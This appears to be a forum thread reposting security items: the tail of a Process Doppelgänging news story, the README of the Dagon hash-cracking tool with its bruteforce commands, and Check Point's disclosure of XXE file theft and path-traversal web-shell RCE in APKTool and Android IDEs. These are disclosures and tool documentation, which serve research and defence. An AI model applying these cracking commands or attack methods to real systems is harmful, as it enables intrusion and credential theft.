was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10. I don't expect Microsoft to rush for an emergency patch that could make some software relying on older implementations unstable, but Antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks. This is not the very first time when enSilo researchers have discovered a malware evasion technique. Previously they discovered and demonstrated AtomBombing technique which also abused a designing weakness in Windows OS. In September, enSilo researchers also disclosed a 17-year-old programming error in Microsoft Windows kernel that prevented security software from detecting malware at runtime when loaded into system memory. Via thehackernews.com

a m ai fost postata spamezi de rupi normele

Dagon - Advanced Hash Manipulation Named after the prince of Hell, Dagon (day-gone) is an advanced hash cracking and manipulation system, capable of bruteforcing multiple hash types, creating bruteforce dictionaries, automatic hashing algorithm verification, random salt generation from Unicode to ASCII, and much more. Note: Dagon comes complete with a Hash Guarantee: I personally guarantee that Dagon will be able to crack your hash successfully. At any point Dagon fails to do so, you will be given a choice to automatically create a Github issue with your hash. Once this issue is created, I will try my best to crack your hash for you. The Github issue is completely anonymous, and no questions will be asked. This is my way of thanking you for using Dagon. There are alternatives to using the automatic issue creator. If you do not want your hash publicly displayed, and feel Dagon has failed you, feel free to create your own issue. Or send an email with the hash information to dagonhashguarantee@gmail.com Screenshots Bruteforcing made easy with a built in wordlist creator if you do not specify one. The wordlist will create 100,000 strings to use Verify what algorithm was used to create that hash you're trying to crack. You can specify to view all possible algorithms by providing the -L flag (some algorithms are not implemented yet) Random salting, unicode random salting, or you can make your own choice on the salt. Demo video Download Preferable you can close the repository with git clone https://github.com/ekultek/dagon.git alternatively you can download the zip or tarball here Basic usage For full functionality of Dagon please reference the homepage here or the user manual python dagon.py -h This will run the help menu and provide a list of all possible flags python dagon.py -c <HASH> --bruteforce This will attempt to bruteforce a given hash python dagon.py -l <FILE-PATH> --bruteforce This will attempt to bruteforce a given file full of hashes (one per line) python dagon.py -v <HASH> This will try to verify the algorithm used to create the hash python dagon.py -V <FILE-PATH> This will attempt to verify each hash in a file, one per line Installation Dagon requires python version 2.7.x to run successfully. git clone https://github.com/ekultek/dagon.git cd Dagon pip install -r requirements.txt This should install all the dependencies that you will need to run Dagon Contributions All contributions are greatly appreciated and helpful. When you contribute you will get your name placed on the homepage underneath contributions with a link to your contribution. You will also get massive respect from me, and that's a pretty cool thing. What I'm looking for in contributions is some of the following: Hashing algorithm creations, specifically; A quicker MD2 algorithm, full Tiger algorithms, Keychain algorithms for cloud and agile More wordlists to download from, please make sure that the link is encoded Rainbow table attack implementation More regular expressions to verify different hash types Source: https://github.com/Ekultek/dagon

Researchers: Eran Vaknin, Gal Elbaz, Alon Boxiner, Oded Vanunu Latest research from the Check Point Research Team has revealed several vulnerabilities, that puts each and every organization that does any type of Java/Android development at great risk of a threat actor exploiting these vulnerabilities and penetrating them. The vulnerabilities in question are the developer tools, both downloadable and cloud based, that the Android application ecosystem, the largest application community in the world, is using. This includes the tools that all Java/Android programmers use to build their companies business applications and that security analysts and reverse engineers use to do their work. As seen in WikiLeak’s ‘Vault 7’ release earlier this year, the CIA and NSA are exploiting vulnerabilities in products of companies of all sizes, all over the world. Earlier this year we saw incidents of the CIA hacking CCleaner, Notepad++ and many more, with the aim of spreading malwares into organizations and acquiring information on their users, and the companies themselves. Through our own research we have found several vulnerabilities that affect the most common Android IDEs – Google’s Android Studio and JetBrains’ IntelliJ IDEA and Eclipse, as well as the major reverse engineering tools for Android applications such as APKTool, the Cuckoo-Droid service and more. Our research below illustrates how we exploited these tools to gain access to internal files. Since this research, Check Point reported the discovery to APKTool developers and the other IDE companies back in May 2017. In turn, Google and JetBrains have verified and acknowledged the security issues and have since effectively deployed a fix. Technical Details – From XXE to RCE: Attacking The Second Layer The first stage of our research was focused on APKTool, (Android Application Package Tool). As the most popular tool for reverse engineering third party Android apps, APKTool is used for supporting custom platforms, analyzing applications and much more, including the decoding and rebuilding of resources. The two main features of the APKTool are: 1. Decompiling an APK file. 2. Building an APK file. From our research we found that APKTool is vulnerable in both of these main features. By looking at the source code of APKTool, we managed to identify an XML External Entity (XXE) vulnerability, due to the fact that the configured XML parser of APKTool does not disable external entity references when parsing an XML file within the program. The vulnerable function is called loadDocument and it is being used in both core functionalities – ‘Build’ and ‘Decompile’ – of APKTool. The vulnerability exposes the whole OS file system of APKTool users, and as a result, attackers could then potentially retrieve any file on the victim’s PC by using a malicious “AndroidManifest.xml” file that exploits an XXE vulnerability, that could then be sent to a remote attacker server. And this attack scenario is just one of many possible XXE attack techniques that could lead to harmful outcomes. Realizing the enormity of this vulnerability to the Android developer and researcher community, we extended our research to the vulnerable XML parser called “DocumentBuilderFactory”, which is being used in APKTool project. Vulnerabilities in Developer Tools This led us to find multiple vulnerable implementations of the XML parser within other projects. Moreover, we identified that the most popular IDEs that are used for building Android applications are affected – including Intellij, Eclipse, and Android Studio. By simply loading the malicious “AndroidManifest.xml” file as part of any Android project, the IDEs starts spitting out any file configured by the attacker. To demonstrate this vulnerability, we have uploaded a malicious project library to GitHub and cloned it to an Android Studio project. Example of a Malicious Github Project With The XXE Payload: Cloned to Android Studio: Result: The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker’s server without the user being aware of it – See image below: Furthermore, we have found another attack scenario that can be used in the wild to attack a massive range of Android developers by injecting a malicious AAR (Android Archive Library) containing our XXE payload into repositories. It is possible, for example, to upload an infected AAR to a public repository such as the central Maven repository, though for demonstration purposes we have uploaded an infected AAR to a local repository. Cloning the infected AAR from the repository by the victim would allow the attacker to steal sensitive files such as configuration files, source code, company digital proprietary and much more from the OS file system. Uploading a Malicious AAR to Local Repository: Adding the AAR to Android Studio Project: Result: The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker’s server without the user being aware of it: Further research of the APKTool then led us to find an additional vulnerability that allows us to execute OS commands on a victim’s PC. For advance use of APKTool there is a configuration file named “APKTOOL.YML”. This file contains an interesting section called “unknownFiles”, which allows users to include a non-standard file location that will be placed correctly on the rebuild process of an APK. The selected files are saved on the filesystem in the ‘Unknown’ folder. A legitimate “APKTOOL.YML” file structure looks like this: By manipulating the path of the “unknownFiles” section inside the “APKTOOL.YML” file, it is possible to inject arbitrary files anywhere on the file system (Path Traversal). This is due to the fact that the APKTool does not validate the path of which the unknown files will be extracted from the packed APK. Indeed, injecting arbitrary files anywhere in the filesystem leads to full Remote Code Execution (RCE) – meaning that any APKTool user/service that will try to decode a crafted malicious APK is vulnerable to RCE. For demonstration purposes, we have created a Web Application similar to the official online APK decoder ( https://apk.tools ). APKTool will extract the malicious file (in this case we used a PHP web shell) to the wwwroot folder of that server: After building the APK with the modified configuration file, the result is a compressed APK with our malicious file inside the malformed path. Uploading the APK to the demo site allows the attacker to execute OS commands on the web application server. This attack could thus be launched against any online/offline service that decodes APKs behind the scenes using APKTool. The way we chose to demonstrate this vulnerability of course is just one of many possible attack methods that can be used to achieve full RCE. Indeed, the Path Traversal method lets us copy any file to any location on the file system, making the attack surface wide and various. All the attacks methods demonstrated above are cross-platform and generic and, as the APKTool is designed to work on top of several operating systems, it is also possible to attack any system on which it operates without restriction or limitation. It is impossible to estimate the number of users of this well-known open source project. Yet, knowing that among them are some large services and companies (e.g. https://apk.tools, http://www.javadecompilers.com/APKTool, https://www.apkdecompilers.com/, http://undroid.av-comparatives.info, Cuckoo droid and many more), we contacted APKTool developer and IDE companies and are pleased to report that they all fixed the security issues and released updated and improved versions of their products. Source: https://research.checkpoint.com/parsedroid-targeting-android-development-research-community/